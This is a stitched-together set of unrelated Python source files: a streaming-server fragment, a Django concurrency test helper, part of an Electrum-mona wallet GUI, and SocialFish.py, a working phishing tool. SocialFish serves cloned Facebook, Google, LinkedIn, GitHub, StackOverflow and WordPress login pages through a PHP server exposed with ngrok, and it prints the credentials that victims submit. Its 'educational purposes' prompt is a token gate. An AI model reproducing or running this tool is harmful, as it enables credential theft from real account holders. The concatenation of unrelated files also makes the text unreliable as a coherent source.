filenames = [f for f in os.listdir(args["whitelist"]) if os.path.isfile(os.path.join(args["whitelist"], f))]
# Load the public key and add it to whitelist
for pubkfile in filenames:
RSA_trusted_client_public_key = None
with open(os.path.join(args["whitelist"], pubkfile), "rb") as key_file:
RSA_trusted_client_public_key = load_pem_public_key(
key_file.read()
)
serialized_RSA_trsuted_client_public_key = RSA_trusted_client_public_key.public_bytes(Encoding.PEM,
PublicFormat.SubjectPublicKeyInfo) # noqa: E501
trusted_keys_whitelist[serialized_RSA_trsuted_client_public_key] = "Trusted"
main_logger.info(f"{len(trusted_keys_whitelist)} Public Key(s) loaded into whitelist")
main_logger.debug(f"trusted_keys_whitelist = {trusted_keys_whitelist}")
disable_ecdh = args["disable_ecdh"]
if disable_ecdh:
main_logger.info("ECDH is disabled, using DSA keys with Diffie-Hellman")
else:
main_logger.info("Using ECDH for key exchange")
RSA_server_public_key = None
RSA_server_private_key = None
with open(args["rsa_pub_key"], "rb") as key_file:
RSA_server_public_key = load_pem_public_key(
key_file.read()
)
with open(args["rsa_priv_key"], "rb") as key_file:
RSA_server_private_key = load_pem_private_key(
key_file.read(),
password=None,
)
# Serialize keys
serialized_RSA_server_public_key = RSA_server_public_key.public_bytes(Encoding.PEM,
PublicFormat.SubjectPublicKeyInfo)
# ## --------- PKI Register Pub Keys START-----------##
# pki_client_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# pki_host_ip = args["pki_host_ip"]
# pki_port = args["pki_port"]
# pki_client_socket.connect((pki_host_ip,pki_port))
# response = registerPublicKey(pki_client_socket, serialized_RSA_server_public_key, RSA_server_private_key)
# print("response:", response)
# pki_client_socket.close()
# ## --------- PKI Register Pub Keys END -----------##
main_logger.info("Setting up server...")
host_ip = args["host_ip"]
port = args["port"]
socket_address = (host_ip, port)
cap_frame_thread = threading.Thread(target=capture_frames, args=(), name='capture_frames', daemon=False)
cap_frame_thread.start()
threads = []
main_logger.info(f"LISTENING AT: {socket_address}")
loop = asyncio.get_event_loop()
loop.create_task(boot_server(host_ip, port))
try:
loop.run_forever()
except KeyboardInterrupt:
main_logger.info("Server is manually shutting down")
stream = False
cap_frame_thread.join()
finally:
main_logger.info("Shutting Down Server")
# try:
# loop.stop()
# loop.run_until_complete(loop.shutdown_asyncgens())
# try:
# # loop.stop()
# pending = asyncio.all_tasks()
# for task in penging:
# task.cancel()
# with suppress(asyncio.CancelledError):
# loop.run_until_complete(task)
# # loop.stop()
# # loop.run_until_complete(loop.shutdown_asyncgens())
# try:
# loop.stop()
# pending = asyncio.all_tasks()
# loop.run_until_complete(asyncio.gather(*pending))
try:
loop.stop()
pending = asyncio.all_tasks()
for task in pending:
task.cancel()
main_logger.debug("Lagging client task has been cancelled")
with suppress(asyncio.CancelledError):
loop.run_until_complete(task)
# loop.run_until_complete(asyncio.gather(*pending))
except RuntimeError as e:
if e.args[0] == 'no running event loop':
main_logger.debug("All Client Connections have been closed already")
pass
else:
raise e
|
SocialFish.py
|
#-*- coding: utf-8 -*-
# SOCIALFISH
# by: UNDEADSEC
#
###########################
from time import sleep
from sys import stdout, exit
from os import system, path
import multiprocessing
from urllib import urlopen
from platform import architecture
from wget import download
RED, WHITE, CYAN, GREEN, END = '\033[91m', '\33[46m', '\033[36m', '\033[1;32m', '\033[0m'
def connected(host='http://duckduckgo.com'):
try:
urlopen(host)
return True
except:
return False
if connected() == False:
print '''
....._____....... ____ ____ ____ _ ____ _ ____ _ ____ _ _
/ \/| [__ | | | | |__| | |___ | [__ |__|
\o__ /\| ___] |__| |___ | | | |___ | | ___] | |
\|
{0}[{1}!{0}]{1} Network error. Verify your connection.\n
'''.format(RED, END)
exit(0)
def checkNgrok():
if path.isfile('Server/ngrok') == False:
print '[*] Downloading Ngrok...'
if architecture()[0] == '64bit':
filename = 'ngrok-stable-linux-amd64.zip'
else:
filename = 'ngrok-stable-linux-386.zip'
url = 'https://bin.equinox.io/c/4VmDzA7iaHb/' + filename
download(url)
system('unzip ' + filename)
system('mv ngrok Server/ngrok')
system('rm -Rf ' + filename)
system('clear')
checkNgrok()
def end():
system('clear')
print '''
S O C I A L{2}
|\ \ \ \ \ \ \ \ __ ___
| \ \ \ \ \ \ \ \ | O~-_ _-~~ ~~-_
| >----|-|-|-|-|-|-|--| __/ / {1}DON'T{2} )
| / / / / / / / / |__\ < {1}FORGET{2} )
|/ / / / / / / / \_ {1}ME !{2} _)
{1}F I S H{2} ~--___--~
{1}[ {0}Watch us on YouTube:{1} https://youtube.com/c/UndeadSec ]
[ {0}Follow me on Twitter:{1} https://twitter.com/A1S0N_ ]
[ {0}Contribute on Github:{1} https://github.com/UndeadSec/SocialFish ]
[ {0}Join our Telegram Group(Portuguese):{1} https://t.me/UndeadSec ]\n'''.format(GREEN, END, CYAN)
def loadModule(module):
print '''{0}
_.-=-._ .-,
.' "-.,' /
( _. <
`=.____.=" `._\\
[{1}*{0}]{1} %s module loaded.{0}'''.format(CYAN, END) % module
def runPhishing(social, option2):
system('sudo rm -Rf Server/www/*.* && touch Server/www/cat.txt')
if option2 == '1' and social == 'Facebook':
system('cp WebPages/fb_standard/*.* Server/www/')
if option2 == '2' and social == 'Facebook':
system('cp WebPages/fb_advanced_poll/*.* Server/www/')
elif option2 == '1' and social == 'Google':
system('cp WebPages/google_standard/*.* Server/www/')
elif option2 == '2' and social == 'Google':
system('cp WebPages/google_advanced_poll/*.* Server/www/')
elif social == 'LinkedIN':
system('cp WebPages/linkedin/*.* Server/www/')
elif social == 'Github':
system('cp WebPages/github/*.* Server/www/')
elif social == 'StackOverflow':
system('cp WebPages/stackoverflow/*.* Server/www/')
elif social == 'WordPress':
system('cp WebPages/wordpress/*.* Server/www/')
def waitCreds():
print " {0}[{1}*{0}]{1} Waiting for credentials... \n".format(GREEN, END)
while True:
with open('Server/www/cat.txt') as creds:
lines = creds.read().rstrip()
if len(lines) != 0:
print ' {0}[ CREDENTIALS FOUND ]{1}:\n {0}%s{1}'.format(GREEN, END) % lines
system('rm -rf Server/www/cat.txt && touch Server/www/cat.txt')
creds.close()
def runPEnv():
system('clear')
print ''' {2}-{1} UNDEADSEC {2}|{1} t.me/UndeadSec {2}|{1} youtube.com/c/UndeadSec {2}- BRAZIL
'
' '
' '
. ' . ' '
' ' ' ' '
███████ ████████ ███████ ██ ███████ ██ ███████ ██ ███████ ██ ██
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ██ ██ ██ ██ ███████ ██ █████ ██ ███████ ███████
██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██ ██
███████ ████████ ███████ ██ ██ ██ ███████ ██ ██ ███████ ██ ██
. ' '....' ..'. ' .
' . . ' ' ' {1}v1.0{2}
' . . . . . '. .' ' .
' ' '. ' {1}Twitter: https://twitter.com/A1S0N_{2}
' ' '
' . '
'
{1}'''.format(GREEN, END, CYAN)
for i in range(101):
sleep(0.01)
stdout.write("\r{0}[{1}*{0}]{1} Preparing environment... %d%%".format(CYAN, END) % i)
stdout.flush()
print "\n\n{0}[{1}*{0}]{1} Searching for PHP installation... ".format(CYAN, END)
if 256 != system('which php'):
print " --{0}>{1} OK.".format(CYAN, END)
else:
print " --{0}>{1} PHP NOT FOUND: \n {0}*{1} Please install PHP and run me again. http://www.php.net/".format(RED, END)
exit(0)
if raw_input(" {0}[{1}!{0}]{1} Do you will use this tool only for educational purposes? (y/n)\n {2}SF > {1}".format(RED, END, CYAN)).upper() == 'N':
system('clear')
print '\n[ {0}YOU ARE NOT AUTHORIZED TO USE THIS TOOL{1} ]\n'.format(RED, END)
exit(0)
option = raw_input("\nSelect an option:\n\n {0}[{1}1{0}]{1} Facebook\n\n {0}[{1}2{0}]{1} Google\n\n {0}[{1}3{0}]{1} LinkedIN\n\n {0}[{1}4{0}]{1} Github\n\n {0}[{1}5{0}]{1} StackOverflow\n\n {0}[{1}6{0}]{1} WordPress\n\n {0}SF > {1}".format(CYAN, END))
if option == '1':
loadModule('Facebook')
option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}SF > {1}".format(CYAN, END))
runPhishing('Facebook', option2)
elif option == '2':
loadModule('Google')
option2 = raw_input("\nOperation mode:\n\n {0}[{1}1{0}]{1} Standard Page Phishing\n\n {0}[{1}2{0}]{1} Advanced Phishing(poll_mode/login_with)\n\n {0}SF > {1}".format(CYAN, END))
runPhishing('Google', option2)
elif option == '3':
loadModule('LinkedIN')
option2 = ''
runPhishing('LinkedIN', option2)
elif option == '4':
loadModule('Github')
option2 = ''
runPhishing('Github', option2)
elif option == '5':
loadModule('StackOverflow')
option2 = ''
runPhishing('StackOverflow', option2)
elif option == '6':
loadModule('WordPress')
option2 = ''
runPhishing('WordPress', option2)
else:
exit(0)
def runNgrok():
system('./Server/ngrok http 80 > /dev/null &')
sleep(10)
system('curl -s http://127.0.0.1:4040/status | grep -P "https://.*?ngrok.io" -oh > ngrok.url')
url = open('ngrok.url', 'r')
print('\n {0}[{1}*{0}]{1} Ngrok URL: {2}' + url.readlines()[0] + '{1}').format(CYAN, END, GREEN)
url.close()
def runServer():
system("cd Server/www/ && sudo php -S 127.0.0.1:80")
if __name__ == "__main__":
try:
runPEnv()
runNgrok()
multiprocessing.Process(target=runServer).start()
waitCreds()
except KeyboardInterrupt:
system('pkill -f ngrok')
end()
exit(0)
|
util.py
|
from django import db
import itertools
import pytest
from contextlib import contextmanager
from demo.models import (
AutoIncConcurrentModel, ConcreteModel, CustomSaveModel, InheritedModel, ProxyModel,
SimpleConcurrentModel, TriggerConcurrentModel
)
from functools import partial, update_wrapper
from itertools import count
from concurrency.config import conf
def sequence(prefix):
infinite = itertools.count()
while 1:
yield "{0}-{1}".format(prefix, next(infinite))
nextname = sequence('username')
nextgroup = sequence('group')
unique_id = count(1)
def override_conf(**kwargs):
for key, new_value in kwargs.items():
setattr(conf, key, new_value)
def clone_instance(model_instance):
"""
returns a copy of the passed instance.
.. warning: All fields are copied, even primary key
:param instance: :py:class:`django.db.models.Model` instance
:return: :py:class:`django.db.models.Model` instance
"""
fieldnames = [fld.name for fld in model_instance._meta.fields]
new_kwargs = {name: getattr(model_instance, name) for name in fieldnames}
return model_instance.__class__(**new_kwargs)
def with_models(*models, **kwargs):
ignore = kwargs.pop('ignore', [])
if ignore:
models = filter(models, lambda x: x not in ignore)
ids = [m.__name__ for m in models]
return pytest.mark.parametrize(('model_class,'),
models,
False,
ids,
None)
MODEL_CLASSES = [SimpleConcurrentModel, AutoIncConcurrentModel,
InheritedModel, CustomSaveModel,
ConcreteModel, ProxyModel, TriggerConcurrentModel]
with_std_models = partial(with_models, SimpleConcurrentModel, AutoIncConcurrentModel,
InheritedModel, CustomSaveModel,
ConcreteModel, ProxyModel)()
with_all_models = partial(with_models, *MODEL_CLASSES)()
# with_all_models = partial(models_parametrize, ConcreteModel)()
DELETE_ATTRIBUTE = object()
@pytest.fixture(params=MODEL_CLASSES)
def concurrent_model(request):
return request.param
@contextmanager
def attributes(*values):
"""
context manager to temporary set/delete object's attributes
:param values: tulples of (target, name, value)
Es.
with attributes((django.contrib.admin.ModelAdmin, 'list_per_page', 200)):
...
with attributes((django.contrib.admin.ModelAdmin, 'list_per_page', DELETE_ATTRIBUTE)):
...
"""
def _set(target, name, value):
if value is DELETE_ATTRIBUTE:
delattr(target, name)
else:
setattr(target, name, value)
backups = []
for target, name, value in values:
if hasattr(target, name):
backups.append((target, name, getattr(target, name)))
else:
backups.append((target, name, getattr(target, name, DELETE_ATTRIBUTE)))
_set(target, name, value)
yield
for target, name, value in backups:
_set(target, name, value)
def concurrently(times=1):
# from: http://www.caktusgroup.com/blog/2009/05/26/testing-django-views-for-concurrency-issues/
"""
Add this decorator to small pieces of code that you want to test
concurrently to make sure they don't raise exceptions when run at the
same time. E.g., some Django views that do a SELECT and then a subsequent
INSERT might fail when the INSERT assumes that the data has not changed
since the SELECT.
"""
def concurrently_decorator(test_func):
def wrapper(*args, **kwargs):
exceptions = []
import threading
def call_test_func():
try:
test_func(*args, **kwargs)
except Exception as e:
exceptions.append(e)
raise
finally:
db.connection.close()
threads = []
for i in range(times):
threads.append(threading.Thread(target=call_test_func))
for t in threads:
t.start()
for t in threads:
t.join()
if exceptions:
raise Exception(
'test_concurrently intercepted %s exceptions: %s' %
(len(exceptions), exceptions))
return update_wrapper(wrapper, test_func)
return concurrently_decorator
|
main_window.py
|
#!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2012 thomasv@gitorious
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import sys
import time
import threading
import os
import traceback
import json
import shutil
import weakref
import csv
from decimal import Decimal
import base64
from functools import partial
import queue
import asyncio
from typing import Optional, TYPE_CHECKING
from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor, QFont
from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal
from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget,
QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel,
QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem,
QHBoxLayout, QPushButton, QScrollArea, QTextEdit,
QShortcut, QMainWindow, QCompleter, QInputDialog,
QWidget, QMenu, QSizePolicy, QStatusBar)
import electrum_mona
from electrum_mona import (keystore, simple_config, ecc, constants, util, bitcoin, commands,
coinchooser, paymentrequest)
from electrum_mona.bitcoin import COIN, is_address, TYPE_ADDRESS
from electrum_mona.plugin import run_hook
from electrum_mona.i18n import _
from electrum_mona.util import (format_time, format_satoshis, format_fee_satoshis,
format_satoshis_plain, NotEnoughFunds,
UserCancelled, NoDynamicFeeEstimates, profiler,
export_meta, import_meta, bh2u, bfh, InvalidPassword,
base_units, base_units_list, base_unit_name_to_decimal_point,
decimal_point_to_base_unit_name, quantize_feerate,
UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException,
get_new_wallet_name, send_exception_to_crash_reporter,
InvalidBitcoinURI, InvoiceError)
from electrum_mona.util import PR_TYPE_ONCHAIN, PR_TYPE_LN
from electrum_mona.lnutil import PaymentFailure, SENT, RECEIVED
from electrum_mona.transaction import Transaction, TxOutput
from electrum_mona.address_synchronizer import AddTransactionException
from electrum_mona.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet,
sweep_preparations, InternalAddressCorruption)
from electrum_mona.version import ELECTRUM_VERSION
from electrum_mona.network import Network, TxBroadcastError, BestEffortRequestFailed
from electrum_mona.exchange_rate import FxThread
from electrum_mona.simple_config import SimpleConfig
from electrum_mona.logging import Logger
from electrum_mona.util import PR_PAID, PR_UNPAID, PR_INFLIGHT, PR_FAILED
from electrum_mona.util import pr_expiration_values
from .exception_window import Exception_Hook
from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit
from .qrcodewidget import QRCodeWidget, QRDialog
from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit
from .transaction_dialog import show_transaction
from .fee_slider import FeeSlider
from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog,
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons,
OkButton, InfoButton, WWLabel, TaskThread, CancelButton,
CloseButton, HelpButton, MessageBoxMixin, EnterButton,
ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui,
filename_field, address_field, char_width_in_lineedit, webopen,
MONOSPACE_FONT)
from .util import ButtonsTextEdit
from .installwizard import WIF_HELP_TEXT
from .history_list import HistoryList, HistoryModel
from .update_checker import UpdateCheck, UpdateCheckThread
from .channels_list import ChannelsList
if TYPE_CHECKING:
from . import ElectrumGui
LN_NUM_PAYMENT_ATTEMPTS = 10
class StatusBarButton(QPushButton):
def __init__(self, icon, tooltip, func):
QPushButton.__init__(self, icon, '')
self.setToolTip(tooltip)
self.setFlat(True)
self.setMaximumWidth(25)
self.clicked.connect(self.onPress)
self.func = func
self.setIconSize(QSize(25,25))
self.setCursor(QCursor(Qt.PointingHandCursor))
def onPress(self, checked=False):
'''Drops the unwanted PyQt5 "checked" argument'''
self.func()
def keyPressEvent(self, e):
if e.key() == Qt.Key_Return:
self.func()
class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger):
payment_request_ok_signal = pyqtSignal()
payment_request_error_signal = pyqtSignal()
network_signal = pyqtSignal(str, object)
#ln_payment_attempt_signal = pyqtSignal(str)
alias_received_signal = pyqtSignal()
computing_privkeys_signal = pyqtSignal()
show_privkeys_signal = pyqtSignal()
def __init__(self, gui_object: 'ElectrumGui', wallet: Abstract_Wallet):
QMainWindow.__init__(self)
self.gui_object = gui_object
self.config = config = gui_object.config # type: SimpleConfig
self.gui_thread = gui_object.gui_thread
self.setup_exception_hook()
self.network = gui_object.daemon.network # type: Network
assert wallet, "no wallet"
self.wallet = wallet
self.fx = gui_object.daemon.fx # type: FxThread
self.contacts = wallet.contacts
self.tray = gui_object.tray
self.app = gui_object.app
self.cleaned_up = False
self.payment_request = None # type: Optional[paymentrequest.PaymentRequest]
self.payto_URI = None
self.checking_accounts = False
self.qr_window = None
self.not_enough_funds = False
self.pluginsdialog = None
self.require_fee_update = False
self.tl_windows = []
self.tx_external_keypairs = {}
Logger.__init__(self)
self.tx_notification_queue = queue.Queue()
self.tx_notification_last_time = 0
self.create_status_bar()
self.need_update = threading.Event()
self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT)
try:
decimal_point_to_base_unit_name(self.decimal_point)
except UnknownBaseUnit:
self.decimal_point = DECIMAL_POINT_DEFAULT
self.num_zeros = int(config.get('num_zeros', 0))
self.completions = QStringListModel()
self.send_tab_is_onchain = False
self.tabs = tabs = QTabWidget(self)
self.send_tab = self.create_send_tab()
self.receive_tab = self.create_receive_tab()
self.addresses_tab = self.create_addresses_tab()
self.utxo_tab = self.create_utxo_tab()
self.console_tab = self.create_console_tab()
self.contacts_tab = self.create_contacts_tab()
#self.channels_tab = self.create_channels_tab(wallet)
tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History'))
tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send'))
tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive'))
def add_optional_tab(tabs, tab, icon, description, name):
tab.tab_icon = icon
tab.tab_description = description
tab.tab_pos = len(tabs)
tab.tab_name = name
if self.config.get('show_{}_tab'.format(name), False):
tabs.addTab(tab, icon, description.replace("&", ""))
add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses")
#if self.wallet.has_lightning():
# add_optional_tab(tabs, self.channels_tab, read_QIcon("lightning.png"), _("Channels"), "channels")
add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo")
add_optional_tab(tabs, self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts")
add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console")
tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.setCentralWidget(tabs)
if self.config.get("is_maximized"):
self.showMaximized()
self.setWindowIcon(read_QIcon("electrum.png"))
self.init_menubar()
wrtabs = weakref.proxy(tabs)
QShortcut(QKeySequence("Ctrl+W"), self, self.close)
QShortcut(QKeySequence("Ctrl+Q"), self, self.close)
QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet)
QShortcut(QKeySequence("F5"), self, self.update_wallet)
QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count()))
QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count()))
for i in range(wrtabs.count()):
QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i))
self.payment_request_ok_signal.connect(self.payment_request_ok)
self.payment_request_error_signal.connect(self.payment_request_error)
self.history_list.setFocus(True)
# network callbacks
if self.network:
self.network_signal.connect(self.on_network_qt)
interests = ['wallet_updated', 'network_updated', 'blockchain_updated',
'new_transaction', 'status',
'banner', 'verified', 'fee', 'fee_histogram', 'on_quotes',
'on_history', 'channel', 'channels_updated',
'invoice_status', 'request_status']
# To avoid leaking references to "self" that prevent the
# window from being GC-ed when closed, callbacks should be
# methods of this class only, and specifically not be
# partials, lambdas or methods of subobjects. Hence...
self.network.register_callback(self.on_network, interests)
# set initial message
self.console.showMessage(self.network.banner)
# update fee slider in case we missed the callback
self.fee_slider.update()
self.load_wallet(wallet)
gui_object.timer.timeout.connect(self.timer_actions)
self.fetch_alias()
# If the option hasn't been set yet
if config.get('check_updates') is None:
choice = self.question(title="Electrum - " + _("Enable update check"),
msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " +
_("Would you like to be notified when there is a newer version of Electrum available?"))
config.set_key('check_updates', bool(choice), save=True)
if config.get('check_updates', False):
# The references to both the thread and the window need to be stored somewhere
# to prevent GC from getting in our way.
def on_version_received(v):
if UpdateCheck.is_newer(v):
self.update_check_button.setText(_("Update to Electrum {} is available").format(v))
self.update_check_button.clicked.connect(lambda: self.show_update_check(v))
self.update_check_button.show()
self._update_check_thread = UpdateCheckThread(self)
self._update_check_thread.checked.connect(on_version_received)
self._update_check_thread.start()
def setup_exception_hook(self):
Exception_Hook(self)
def on_fx_history(self):
self.history_model.refresh('fx_history')
self.address_list.update()
def on_fx_quotes(self):
self.update_status()
# Refresh edits with the new rate
edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e
edit.textEdited.emit(edit.text())
edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e
edit.textEdited.emit(edit.text())
# History tab needs updating if it used spot
if self.fx.history_used_spot:
self.history_model.refresh('fx_quotes')
self.address_list.update()
def toggle_tab(self, tab):
show = not self.config.get('show_{}_tab'.format(tab.tab_name), False)
self.config.set_key('show_{}_tab'.format(tab.tab_name), show)
item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description)
tab.menu_action.setText(item_text)
if show:
# Find out where to place the tab
index = len(self.tabs)
for i in range(len(self.tabs)):
try:
if tab.tab_pos < self.tabs.widget(i).tab_pos:
index = i
break
except AttributeError:
pass
self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", ""))
else:
i = self.tabs.indexOf(tab)
self.tabs.removeTab(i)
def push_top_level_window(self, window):
'''Used for e.g. tx dialog box to ensure new dialogs are appropriately
parented. This used to be done by explicitly providing the parent
window, but that isn't something hardware wallet prompts know.'''
self.tl_windows.append(window)
def pop_top_level_window(self, window):
self.tl_windows.remove(window)
def top_level_window(self, test_func=None):
'''Do the right thing in the presence of tx dialog windows'''
override = self.tl_windows[-1] if self.tl_windows else None
if override and test_func and not test_func(override):
override = None # only override if ok for test_func
return self.top_level_window_recurse(override, test_func)
def diagnostic_name(self):
#return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name())
return self.wallet.diagnostic_name()
def is_hidden(self):
return self.isMinimized() or self.isHidden()
def show_or_hide(self):
if self.is_hidden():
self.bring_to_top()
else:
self.hide()
def bring_to_top(self):
self.show()
self.raise_()
def on_error(self, exc_info):
e = exc_info[1]
if isinstance(e, UserCancelled):
pass
elif isinstance(e, UserFacingException):
self.show_error(str(e))
else:
try:
self.logger.error("on_error", exc_info=exc_info)
except OSError:
pass # see #4418
self.show_error(repr(e))
def on_network(self, event, *args):
# Handle in GUI thread
self.network_signal.emit(event, args)
def on_network_qt(self, event, args=None):
# Handle a network message in the GUI thread
if event == 'wallet_updated':
wallet = args[0]
if wallet == self.wallet:
self.need_update.set()
elif event == 'network_updated':
self.gui_object.network_updated_signal_obj.network_updated_signal \
.emit(event, args)
self.network_signal.emit('status', None)
elif event == 'blockchain_updated':
# to update number of confirmations in history
self.need_update.set()
elif event == 'new_transaction':
wallet, tx = args
if wallet == self.wallet:
self.tx_notification_queue.put(tx)
elif event == 'on_quotes':
self.on_fx_quotes()
elif event == 'on_history':
self.on_fx_history()
#elif event == 'channels_updated':
# self.channels_list.update_rows.emit(*args)
#elif event == 'channel':
# self.channels_list.update_single_row.emit(*args)
# self.update_status()
elif event == 'request_status':
self.on_request_status(*args)
elif event == 'invoice_status':
self.on_invoice_status(*args)
elif event == 'status':
self.update_status()
elif event == 'banner':
self.console.showMessage(args[0])
elif event == 'verified':
wallet, tx_hash, tx_mined_status = args
if wallet == self.wallet:
self.history_model.update_tx_mined_status(tx_hash, tx_mined_status)
elif event == 'fee':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
elif event == 'fee_histogram':
if self.config.is_dynfee():
self.fee_slider.update()
self.require_fee_update = True
self.history_model.on_fee_histogram()
else:
self.logger.info(f"unexpected network event: {event} {args}")
def fetch_alias(self):
self.alias_info = None
alias = self.config.get('alias')
if alias:
alias = str(alias)
def f():
self.alias_info = self.contacts.resolve_openalias(alias)
self.alias_received_signal.emit()
t = threading.Thread(target=f)
t.setDaemon(True)
t.start()
def close_wallet(self):
if self.wallet:
self.logger.info(f'close_wallet {self.wallet.storage.path}')
run_hook('close_wallet', self.wallet)
@profiler
def load_wallet(self, wallet):
wallet.thread = TaskThread(self, self.on_error)
self.update_recently_visited(wallet.storage.path)
if wallet.lnworker:
wallet.lnworker.on_channels_updated()
self.need_update.set()
# Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized
# update menus
self.seed_menu.setEnabled(self.wallet.has_seed())
self.update_lock_icon()
self.update_buttons_on_seed()
self.update_console()
self.clear_receive_tab()
self.request_list.update()
#self.channels_list.update()
self.tabs.show()
self.init_geometry()
if self.config.get('hide_gui') and self.gui_object.tray.isVisible():
self.hide()
else:
self.show()
self.watching_only_changed()
run_hook('load_wallet', wallet, self)
try:
wallet.try_detecting_internal_addresses_corruption()
except InternalAddressCorruption as e:
self.show_error(str(e))
send_exception_to_crash_reporter(e)
def init_geometry(self):
winpos = self.wallet.storage.get("winpos-qt")
try:
screen = self.app.desktop().screenGeometry()
assert screen.contains(QRect(*winpos))
self.setGeometry(*winpos)
except:
self.logger.info("using default geometry")
self.setGeometry(100, 100, 840, 400)
def watching_only_changed(self):
name = "Electrum-mona Testnet" if constants.net.TESTNET else "Electrum-mona"
title = '%s %s - %s' % (name, ELECTRUM_VERSION,
self.wallet.basename())
extra = [self.wallet.storage.get('wallet_type', '?')]
if self.wallet.is_watching_only():
extra.append(_('watching only'))
title += ' [%s]'% ', '.join(extra)
self.setWindowTitle(title)
self.password_menu.setEnabled(self.wallet.may_have_password())
self.import_privkey_menu.setVisible(self.wallet.can_import_privkey())
self.import_address_menu.setVisible(self.wallet.can_import_address())
self.export_menu.setEnabled(self.wallet.can_export())
def warn_if_watching_only(self):
if self.wallet.is_watching_only():
msg = ' '.join([
_("This wallet is watching-only."),
_("This means you will not be able to spend Bitcoins with it."),
_("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.")
])
self.show_warning(msg, title=_('Watch-only wallet'))
def warn_if_testnet(self):
if not constants.net.TESTNET:
return
# user might have opted out already
if self.config.get('dont_show_testnet_warning', False):
return
# only show once per process lifecycle
if getattr(self.gui_object, '_warned_testnet', False):
return
self.gui_object._warned_testnet = True
msg = ''.join([
_("You are in testnet mode."), ' ',
_("Testnet coins are worthless."), '\n',
_("Testnet is separate from the main Bitcoin network. It is used for testing.")
])
cb = QCheckBox(_("Don't show this again."))
cb_checked = False
def on_cb(x):
nonlocal cb_checked
cb_checked = x == Qt.Checked
cb.stateChanged.connect(on_cb)
self.show_warning(msg, title=_('Testnet'), checkbox=cb)
if cb_checked:
self.config.set_key('dont_show_testnet_warning', True)
def open_wallet(self):
try:
wallet_folder = self.get_wallet_folder()
except FileNotFoundError as e:
self.show_error(str(e))
return
filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if not filename:
return
self.gui_object.new_window(filename)
def backup_wallet(self):
path = self.wallet.storage.path
wallet_folder = os.path.dirname(path)
filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder)
if not filename:
return
new_path = os.path.join(wallet_folder, filename)
if new_path != path:
try:
shutil.copy2(path, new_path)
self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created"))
except BaseException as reason:
self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup"))
def update_recently_visited(self, filename):
recent = self.config.get('recently_open', [])
try:
sorted(recent)
except:
recent = []
if filename in recent:
recent.remove(filename)
recent.insert(0, filename)
recent = [path for path in recent if os.path.exists(path)]
recent = recent[:5]
